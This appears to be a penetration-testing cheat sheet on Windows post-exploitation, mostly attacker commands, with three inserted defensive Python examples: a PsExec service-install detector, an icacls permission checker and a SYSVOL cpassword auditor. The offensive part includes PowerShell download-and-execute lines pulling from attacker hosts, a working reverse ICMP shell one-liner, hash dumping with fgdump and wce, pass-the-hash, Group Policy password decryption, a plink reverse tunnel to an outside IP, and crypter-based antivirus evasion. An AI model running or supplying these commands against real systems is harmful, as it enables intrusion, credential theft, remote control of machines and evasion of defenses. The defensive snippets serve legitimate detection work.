Chapter 4 - Windows Post-Exploitation


Last updated 4 years ago


“Practice the principle of least privilege. Do not log into a computer with administrator rights unless you must do so to perform specific tasks. Running your computer as an administrator (or as a Power User in Windows) leaves your computer vulnerable to security risks and exploits. Simply visiting an unfamiliar Internet site with these high-privilege accounts can cause extreme damage to your computer, such as reformatting your hard drive, deleting all your files, and creating a new user account with administrative access.”

— Indiana University (Best practices for computer security)

This is the phase I like to refer to as second-pass enumeration, or enumeration from the inside. Now that we've gained a foothold in the network, it is crucial to run all of our enumeration again from the ground up, this time as an inside actor.

Resources

Cross Compiling from Kali

Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c

Transpile Python into EXE

Kali> python pyinstaller.py --onefile file.py

Uploading Files

Kali> cp /usr/share/windows-binaries/nc.exe .
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt

Security Stuff

AZURE

Powershell Foo

Resources

Download File

C:\> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')"
Kali> echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10:8000/')" | iconv -t utf-16le

wget

echo $storageDir = $pwd > wget.ps1   
echo $webclient = New-Object System.Net.WebClient >> wget.ps1   
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1    
echo $webclient.DownloadFile($url,$file) >> wget.ps1

C:\> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Execute ps1

C:\> powershell -exec bypass -windowstyle hidden -nop -file c:\path\to\file.ps1

Stream contents of file

C:\> Get-Item /path/to/file.zip -Stream *

Get permissions of directory/file

C:\> Get-ACL C:\path\to\file\or\directory

Packet testing

# TCP
# Setup TCP Listener ie: netcat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.TcpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.GetStream().Write($packet, 0, $packet.Length);$client.Close();'

# UDP
# Setup UDP Listener ie: socat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.UdpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send($packet, $packet.Length);$client.Close();'

# ICMP
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -Command '$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $True;$packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send("10.10.14.42", 500, $packet, $options);'

Reverse ICMP shell

Kali> sudo bash -c "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET

C:\> powershell -nop -Command "$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"

Services

LDAP

Kerberos

Dump Hashes

C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump

WCE

C:\> wce -w

PSExec

You need to be an admin already; PsExec copies an executable to an admin share on the target, registers it there as a service, and starts it.
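
Because PsExec-style execution always leaves a "service was installed" record (System log Event ID 7045) on the target, that event is the natural place to detect it. The following is an added example, not code from the original page: a small detector over constructed, flattened 7045 records (host names, service names and paths are made up) that flags services installed from an admin share, the well-known PSEXESVC name, or a demand-start SYSTEM service whose binary sits directly in the Windows root.

```python
import re

# Constructed sample of Windows System-log "A service was installed" events
# (Event ID 7045), flattened to key=value lines as a log forwarder might emit them.
SAMPLE_EVENTS = [
    'EventID=7045 Host=DEV01 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe StartType="demand start" Account=LocalSystem',
    'EventID=7045 Host=DEV01 ServiceName=WinDefend ImagePath="C:\\Program Files\\Windows Defender\\MsMpEng.exe" StartType="auto start" Account=LocalSystem',
    'EventID=7045 Host=FS02 ServiceName=BTOBTO ImagePath=\\\\127.0.0.1\\ADMIN$\\a1b2c3.exe StartType="demand start" Account=LocalSystem',
    'EventID=7036 Host=FS02 ServiceName=Spooler State=running',
]

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# UNC path through an administrative share, e.g. \\host\ADMIN$\x.exe or \\host\C$\x.exe
ADMIN_SHARE_RE = re.compile(r'^\\\\[^\\]+\\(ADMIN\$|[A-Za-z]\$)\\', re.IGNORECASE)
# Executable dropped straight into the Windows root rather than a proper install folder
WINROOT_RE = re.compile(r'^(%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$', re.IGNORECASE)

def parse_event(line):
    """Turn one key=value line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}

def is_psexec_like(ev):
    """True for a 7045 install that matches the PsExec pattern: the PSEXESVC name,
    a binary reached via an admin share, or a demand-start SYSTEM service whose
    image lives directly in the Windows root."""
    if ev.get('EventID') != '7045':
        return False
    path = ev.get('ImagePath', '')
    if ev.get('ServiceName', '').upper() == 'PSEXESVC':
        return True
    if ADMIN_SHARE_RE.match(path):
        return True
    return (WINROOT_RE.match(path) is not None
            and ev.get('StartType', '') == 'demand start'
            and ev.get('Account', '') == 'LocalSystem')

def find_suspicious_installs(lines):
    """Return (host, service name, image path) for every flagged event."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_psexec_like(ev):
            hits.append((ev['Host'], ev['ServiceName'], ev['ImagePath']))
    return hits

if __name__ == '__main__':
    for host, name, path in find_suspicious_installs(SAMPLE_EVENTS):
        print(f'{host}: service {name!r} installed from {path}')
```

Tools that rename their service (the BTOBTO line above) still trip the admin-share and Windows-root checks, which is why the rule does not rely on the service name alone.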

UAC

WMIC

Insecure File Permissions

C:\> icacls example.exe
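
Reading icacls output by eye scales poorly across a whole host, so here is an added example (not from the original page) that parses it and reports only the entries that matter: low-privilege principals holding a right that lets them change the file or its ACL. The icacls output below is constructed for the example, and the principal and right sets are the author's assumptions, not an exhaustive list.

```python
import re

# Constructed icacls output for a service binary with overly broad rights
# (not captured from a real host).
SAMPLE_ICACLS = """example.exe BUILTIN\\Administrators:(I)(F)
            NT AUTHORITY\\SYSTEM:(I)(F)
            BUILTIN\\Users:(I)(RX)
            NT AUTHORITY\\Authenticated Users:(I)(M)
            Everyone:(W)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that every logged-on user (not only admins) resolves to.
LOW_PRIV_PRINCIPALS = {
    "everyone", "builtin\\users", "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# Simple and specific rights that allow changing the file's contents or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "DC"}

ACE_RE = re.compile(r"^\s*(?P<who>[^:]+?):(?P<rights>(?:\([^)]*\))+)\s*$")

def parse_icacls(path, output):
    """Return (principal, set_of_rights) for every ACE icacls printed for `path`."""
    aces = []
    for line in output.splitlines():
        if line.startswith(path):               # first ACE is prefixed with the file name
            line = line[len(path):]
        m = ACE_RE.match(line)
        if not m:
            continue                            # summary line or blank line
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
            rights.update(t for t in group.split(",") if t)
        aces.append((m.group("who").strip(), rights))
    return aces

def weak_write_grants(path, output):
    """Return the low-privilege principals that can modify the file (or its ACL)."""
    return [(who, sorted(rights & WRITE_RIGHTS))
            for who, rights in parse_icacls(path, output)
            if who.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS]

if __name__ == "__main__":
    for who, rights in weak_write_grants("example.exe", SAMPLE_ICACLS):
        print(f"{who} can write example.exe via {','.join(rights)}")
```

Inheritance and flag tokens such as (I), (OI) and (CI) are parsed like any other token but never match the write set, so they do not produce false positives.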

Insecure SYSVOL

C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy <path-from-dir-output>\Groups.xml .
Kali> gpp-decrypt <cpassword-attribute-from-Groups.xml>
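
The defensive counterpart is auditing SYSVOL for Group Policy Preference files that still carry a cpassword attribute, since every domain user can read them. This added example (not code from the original page) builds a throwaway SYSVOL-style tree containing a constructed Groups.xml, walks it, and reports each cpassword it finds without decrypting anything; the domain name, GPO GUID and cpassword value are placeholders.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed Groups.xml in the shape Group Policy Preferences writes; the
# cpassword value is a made-up placeholder, not a real encrypted credential.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin" image="2" changed="2016-05-01 10:00:00" uid="{PLACEHOLDER-UID}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="PLACEHOLDER_BASE64_CPASSWORD" changeLogon="0"
        noChange="1" neverExpires="1" acctDisabled="0" userName="localadmin"/>
  </User>
</Groups>
"""

# GPP files known to embed credentials in a cpassword attribute.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "printers.xml", "drives.xml"}

def find_cpasswords(sysvol_root):
    """Walk a SYSVOL tree and return (file, userName, cpassword) for every
    GPP XML file that still carries a cpassword attribute."""
    findings = []
    for dirpath, _, files in os.walk(sysvol_root):
        for name in files:
            if name.lower() not in GPP_FILES:
                continue
            full = os.path.join(dirpath, name)
            try:
                root = ET.parse(full).getroot()
            except ET.ParseError:
                continue                        # malformed file: skip, do not crash the audit
            for props in root.iter("Properties"):
                cpw = props.get("cpassword")
                if cpw:
                    findings.append((full, props.get("userName", "?"), cpw))
    return findings

def demo():
    """Create a placeholder SYSVOL layout holding the sample file and audit it."""
    with tempfile.TemporaryDirectory() as sysvol:
        gpo_dir = os.path.join(sysvol, "corp.local", "Policies", "{PLACEHOLDER-GPO-GUID}",
                               "Machine", "Preferences", "Groups")
        os.makedirs(gpo_dir)
        with open(os.path.join(gpo_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return [(os.path.relpath(f, sysvol), user) for f, user, _ in find_cpasswords(sysvol)]

if __name__ == "__main__":
    for rel, user in demo():
        print(f"cpassword still present for {user!r} in {rel}")
```

Run `find_cpasswords` against a real mounted SYSVOL share; each hit should lead to deleting the preference item and resetting the affected account's password, since the MS14-025 patch only stops new cpassword entries from being written.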

RDP

DLL Injection

NTLM/v2

Token Stealing

Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain.

Passing the Hash

Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd

runas

Encapsulating SSH Traffic with httptunnel

# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1

# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:\> netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe

# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389:127.0.0.1:3389 208.68.234.99 -P 3000

# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/Hyperion-1.0.zip .
Kali> unzip Hyperion-1.0.zip && cd Hyperion-1.0
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe

Note: If the above does not work, you might need to convert it to UTF-16 little-endian, because that is what the Windows OS expects. More here:

Windows Privilege Escalation Fundamentals - FuzzySecurity
Windows PrivEsc Check - GitHub
Windows Exploit Suggester - GitHub
Encyclopaedia Of Windows Privilege Escalation - YouTube
Level Up! Practical Windows Privilege Escalation - YouTube
Windows Privilege Escalation methods for PenTesters
Windows Attacks: AT is the new Black - YouTube
Well, that escalated quickly
Analyzing local privilege escalations in win2k
The System Challenge - Decoder's Blog
The Wallstreet of Windows Binaries
Windows Operating System Archaeology
Breaking .NET Through Serialization
Windows Kernel Exploits - GitHub
Exploitation Techniques and Mitigations on Windows
Windows Exploitation
Authentication Registry Keys - MSDN
Demystifying AppContainers in Windows 8 Part 1
Protected Processes in Windows
LSA Authentication - MSDN
Intercepting System Calls on x86_64 Windows
Introduction to Windows Kernel Security
Windows 8 ASLR Internals
Windows Program Automatic Startup Locations
Demystifying the Windows Firewall
Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack
Bypassing Firewalls with Port 23
Pass the hash is dead long live LocalAccountTokenFilterPolicy
NetView
Getting Windows to play with itself: A PenTester's guide to Windows API abuse
Compromise as a Service: our pleAZURE
Attacking ADFS Endpoints with PowerShell
PowerShell AD Recon
PowerShell Secrets and Tactics
An Intro to PowerShell and how to use it for Evil
Offensive Active Directory with PowerShell
Low-Level Windows API Access From PowerShell - FuzzySecurity
PowerShell Unicorn
Sherlock for Powershell
UTF-16 is used internally by systems such as Microsoft Windows
Windows Privilege Escalation via weak Service Permissions
The Art of Becoming TrustedInstaller
5 Ways to find Systems running domain admin processes
I hunt SysAdmins part 1
I hunt SysAdmins part 2
PenTesting Active Directory Environments: CrapMapExec
Active Directory Privilege Relationships: BloodHound
Active Directory Architecture - MSDN
A Week of Evading Microsoft ATA Day 1
Dumping a domain's worth of passwords with mimikatz part 2
Attack Methods for gaining Domain Admin
Find AD users with empty passwords
Domain Trusts and why you should care
A PenTester's guide to group scoping
How to own any Windows network with group policy hijacking attacks
The Secret Life of Krbtgt
Kerberos Golden Ticket Protection
Kerberos Golden Ticket Final
Et Tu Kerberos
Abusing Microsoft Kerberos
How to pass the ticket through SSH tunnels
From Pass the Hash to Pass the Ticket with no pain
Abusing Token Privileges for LPE
Dump windows password hashes efficiently part 1
I'll get your credentials... Later! - FuzzySecurity
Grab the Windows Secrets! - Decoder's Blog
SysInternals PSExec - TechNet
PUPY
WinEXE
PSExec Pass the Hash
Lateral Movement with Invoke-PsExec
UACME
Anatomy of UAC Attacks - FuzzySecurity
WMIExec.py
Elevating privileges by exploiting weak folder permissions
RDP Hijacking: How to hijack RDS and RemoteApp sessions transparently to move through an organization
Windows DLL Injection Basics
Portable Execution Injection
Automated DLL Enumeration
Automated DLL Injection
Practical guide to NTLM Relaying in 2017 AKA Getting a foothold in under 5 minutes
SMB Relay demystified and NTLMv2 Pwnage with Python
Pass the Hash toolkit
Invoke-Runas
Runas Reference
SigThief